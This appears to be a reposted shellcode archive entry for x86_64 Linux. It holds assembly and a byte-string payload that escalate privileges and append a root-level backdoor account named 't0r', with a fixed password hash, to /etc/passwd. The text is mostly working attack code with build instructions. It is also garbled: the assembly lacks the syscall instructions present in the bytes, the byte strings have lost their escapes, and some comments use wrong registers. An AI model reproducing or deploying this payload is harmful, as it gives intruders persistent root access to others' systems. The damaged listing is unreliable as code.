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# Title : Linux x86_64 - add user with passwd (189 bytes)
# Published : 2012-03-12
# Author :
# Previous Title : Linux/x86 Search For php,html Writable Files and Add Your Code
# Next Title : bds/x86-bindshell on port 2525 shellcode - 167 bytes

;Arch:			x86_64, Linux
;Author:		0_o -- null_null
;			nu11.nu11 [at] yahoo.com
;Date:			2012-03-05
;compile an executable:	nasm -f elf64 sc_adduser.S
;			ld -o sc_adduser sc_adduser.o
;compile an object:	nasm -o sc_adduser_obj sc_adduser.S
;Purpose:		adds user "t0r" with password "Winner" to /etc/passwd
;executed syscalls: 	setreuid, setregid, open, write, close, exit
;Result:		t0r:3UgT5tXKUkUFg:0:0::/root:/bin/bash
;syscall op codes:	/usr/include/x86_64-linux-gnu/asm/unistd_64.h


[SECTION .text]

global _start


	;sys_setreuid(uint ruid, uint euid)
        xor     rax,    rax
        mov     al,     113                     ;syscall sys_setreuid
        xor     rbx,    rbx                     ;arg 1 -- set real uid to root
        mov     rcx,    rbx                     ;arg 2 -- set effective uid to root

        ;sys_setregid(uint rgid, uint egid)
        xor     rax,    rax
        mov     al,     114                     ;syscall sys_setregid
	xor     rbx,    rbx                     ;arg 1 -- set real uid to root
        mov     rcx,    rbx                     ;arg 2 -- set effective uid to root
	;push all strings on the stack prior to file operations.
	xor	rbx,	rbx
	mov     ebx,    0x647773FF
        shr     rbx,    8
        push    rbx                             ;string 0dws
        mov     rbx,    0x7361702f6374652f
        push    rbx                             ;string sap/cte/
	mov     rbx,    0x0A687361622F6EFF
        shr     rbx,    8
        push    rbx                             ;string 0nhsab/n
        mov     rbx,    0x69622F3A746F6F72
        push    rbx                             ;string ib/:toor
        mov     rbx,    0x2F3A3A303A303A67
        push    rbx                             ;string /::0:0:g
	mov	rbx,	0x46556B554B587435
	push	rbx				;string FUkUKXt5
	mov	rbx,	0x546755333A723074
	push	rbx				;string TgU3:r0t
	;prelude to doing anything useful...
	mov	rbx,	rsp			;save stack pointer for later use
	push	rbp				;store base pointer to stack so it can be restored later
	mov	rbp,	rsp			;set base pointer to current stack pointer
	;sys_open(char* fname, int flags, int mode)
	sub	rsp,		16
	mov	[rbp - 16],	rbx		;store pointer to "t0r..../bash"
	mov	si,		0x0401		;arg 2 -- flags
	mov	rdi,		rbx
	add	rdi,		40		;arg 1 -- pointer to "/etc/passwd"
	xor	rax,		rax
	mov	al,		2		;syscall sys_open
	;sys_write(uint fd, char* buf, uint size)
	mov	[rbp - 4],	eax		;arg 1 -- fd is retval of sys_open. save fd to stack for later use.
	mov	rcx,		rbx		;arg 2 -- load rcx with pointer to string "t0r.../bash"
	xor	rdx,		rdx
	mov	dl,		39		;arg 3 -- load rdx with size of string "t0r.../bash0"
	mov	rsi,		rcx		;arg 2 -- move to source index register
	mov	rdi,		rax		;arg 1 -- move to destination index register
	xor     rax,            rax
        mov     al,             1               ;syscall sys_write
	;sys_close(uint fd)
	xor	rdi,		rdi
	mov	edi,		[rbp - 4]	;arg 1 -- load stored file descriptor to destination index register
	xor	rax,		rax
	mov	al,		3		;syscall sys_close
	;sys_exit(int err_code)
	xor	rax,	rax
	mov	al,	60			;syscall sys_exit
	xor	rbx,	rbx			;arg 1 -- error code
;char shellcode[] =
;	"x48x31xc0xb0x71x48x31xdbx48x31xc9x0fx05x48x31"
;	"xc0xb0x72x48x31xdbx48x31xc9x0fx05x48x31xdbxbb"
;	"xffx73x77x64x48xc1xebx08x53x48xbbx2fx65x74x63"
;	"x2fx70x61x73x53x48xbbxffx6ex2fx62x61x73x68x0a"
;	"x48xc1xebx08x53x48xbbx72x6fx6fx74x3ax2fx62x69"
;	"x53x48xbbx67x3ax30x3ax30x3ax3ax2fx53x48xbbx35"
;	"x74x58x4bx55x6bx55x46x53x48xbbx74x30x72x3ax33"
;	"x55x67x54x53x48x89xe3x55x48x89xe5x48x83xecx10"
;	"x48x89x5dxf0x66xbex01x04x48x89xdfx48x83xc7x28"
;	"x48x31xc0xb0x02x0fx05x89x45xfcx48x89xd9x48x31"
;	"xd2xb2x27x48x89xcex48x89xc7x48x31xc0xb0x01x0f"
;	"x05x48x31xffx8bx7dxfcx48x31xc0xb0x03x0fx05x48"
;	"x31xc0xb0x3cx48x31xdbx0fx05";
;equivalent code:
;char shellcode[] =
;	"x48x31xc0xb0x71x48x31xdbx48x89xd9x0fx05x48x31"
;	"xc0xb0x72x48x31xdbx48x89xd9x0fx05x48x31xdbxbb"
;	"xffx73x77x64x48xc1xebx08x53x48xbbx2fx65x74x63"
;	"x2fx70x61x73x53x48xbbxffx6ex2fx62x61x73x68x0a"
;	"x48xc1xebx08x53x48xbbx72x6fx6fx74x3ax2fx62x69"
;	"x53x48xbbx67x3ax30x3ax30x3ax3ax2fx53x48xbbx35"
;	"x74x58x4bx55x6bx55x46x53x48xbbx74x30x72x3ax33"
;	"x55x67x54x53x48x89xe3x55x48x89xe5x48x83xecx10"
;	"x48x89x5dxf0x66xbex01x04x48x89xdfx48x83xc7x28"
;	"x48x31xc0xb0x02x0fx05x89x45xfcx48x89xd9x48x31"
;	"xd2xb2x27x48x89xcex48x89xc7x48x31xc0xb0x01x0f"
;	"x05x48x31xffx8bx7dxfcx48x31xc0xb0x03x0fx05x48"
;	"x31xc0xb0x3cx48x31xdbx0fx05";